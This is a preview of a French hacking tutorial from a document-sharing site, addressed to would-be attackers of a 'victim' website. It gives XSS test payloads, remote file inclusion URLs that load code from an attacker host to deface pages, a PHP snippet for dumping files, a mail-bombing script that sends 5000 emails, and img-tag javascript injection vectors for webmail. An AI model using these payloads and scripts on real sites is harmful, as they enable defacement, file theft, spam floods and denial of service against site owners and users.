Hack

Disponible uniquement sur Etudier
  • Pages : 8 (1960 mots )
  • Téléchargement(s) : 0
  • Publié le : 11 mai 2011
Lire le document complet
Aperçu du document
Pour vérifier si le Webmaster n'a pas pensé à sécuriser son code, voici comment faire :
http://www.victime.net/casimir.php?page=4&titre=<script>alert("C'est du billard !")</script>

Si la page affiche une boite de dialogue avec inscrit "C'est du billard", c'est que c'est du billard :), vous vous êtes trouvé une victime !
Vous n'avez donc plus qu'à remplacer le titre par, parexemple, une fonction include() :
include("http://www.hackeur.net/tmor.php")

De cette façon, la page tmor.php de votre site (hackeur.net) apparaitra dans la page de la victime, à la place du titre.
Dans un moteur de recherche
Par exemple, un moteur de recherche interne au site www.victime.net propose de rechercher les différents éléments de l'Ile aux enfants.
Pour tester la faille, vousentrerez alors ce mot clé :
<script>alert("C'est du billard")</script>

Si la page de résultat affiche une boîte de dialogue avec inscrit "C'est du billard", c'est que c'est Ok !

Imaginons maintenant que vous détourniez ce script :
http://www.victime.net/index.php?fichier=http://www.hackeur.net/tmor.php

La page tmor.php contenant un code ordonnant d'écrire par exemple "Fuck you"en énorme sur la page index.php.
Le pirate a donc réussit à faire exécuter le code contenu dans la page tmor.php de son propre site dans le site www.victime.net.
Ce code ordonnant de réécrire la page index.php du site, affiche ce qu'il veut sur la page index de la victime. Et cela durablement, jusqu'à ce que le webmaster s'en rende compte.
On dit alors qu'il a déffacé la page.
A partir de là,maintes possibilités sont à porté de main, comme par exemple l'affichage de la page php elle-même.
Si tmor.php contenait cela, ce serait possible :
<?php
$inF = fopen($file, "r");
$j="";
while (!feof($inF)) {
$j=$j.fgets($inF, 4096)."<br> ";
}
$j='<font color="#000">'.$j.'</font>';
echo $j;
fclose($inF);
?>
La faille mail()
La fonction mail() de PHPpermet l'envoi de mails de façon simple via un script.
Cette fonction n'est pas proprement dit une faille, mais il est possible de l'employer pour des envois massifs de spams, faire du mail-bombing.

Le principe est trés simple, le hackeur pensera que s'il envoi des spams depuis un script PHP hébergé sur son hébergeur, c'est l'IP de ce dernier qui apparaitra dans les headers des courriers. Ce quipar ailleurs exact.
Voici un exemple de script destiné à mail-bomber :
<?php
$to = "casimir@victime.net";
$subject = "T mor !";
$message = "Casimir est mort, l'Ile aux enfant n'est plus d'or.";
for($i=0; $i<5000; i++) {
mail($to, $subject, $message);
}
?>

Ce script exécutant la fonction mail() à l'aide d'une boucle for, l'e-mail $to recevra 5000 messages et cela en touteanonymat.
Ce qui permet à cerains de comprendre pourquoi cette fonction si utile est bien souvent désactivée pour les hébergeurs gratuit, acceptant le PHP bien sûr !
Les failles Webmail
La meilleure façon d'exploiter ces failles est d'utiliser la balise <IMG> et son argument SRC.
Via les balises <img src="http://..."> & <img src="ftp://...">, il est tout a fait possibled'envoyer des paramètres à un script CGI se trouvant sur un site distant avec différents pass et droits d'accés.
A partir de là, bien utilisée, cette faille peut permettre de poster des messages sur un forum, activer un DoS (Deny of Service), pirater un serveur, etc.

Plusieurs arguments de IMG permettent l'exécution d'un Javascript :
<img src="javascript:...">
<imgdynsrc="javascript:...">
<img lowsrc="javascript:...">

Créer un script PHP
PHP n'affiche pas son code dans la source de la page, ce sera le serveur (là où votre site est hébergé) qui lira votre script pour renvoyer au visiteur une page HTML.

Voici un code PHP qui va ordonner au serveur d'afficher le texte "My flowers are beautiful" sur la page.

Exemple :
<?php echo("My flowers are beautiful");...
tracking img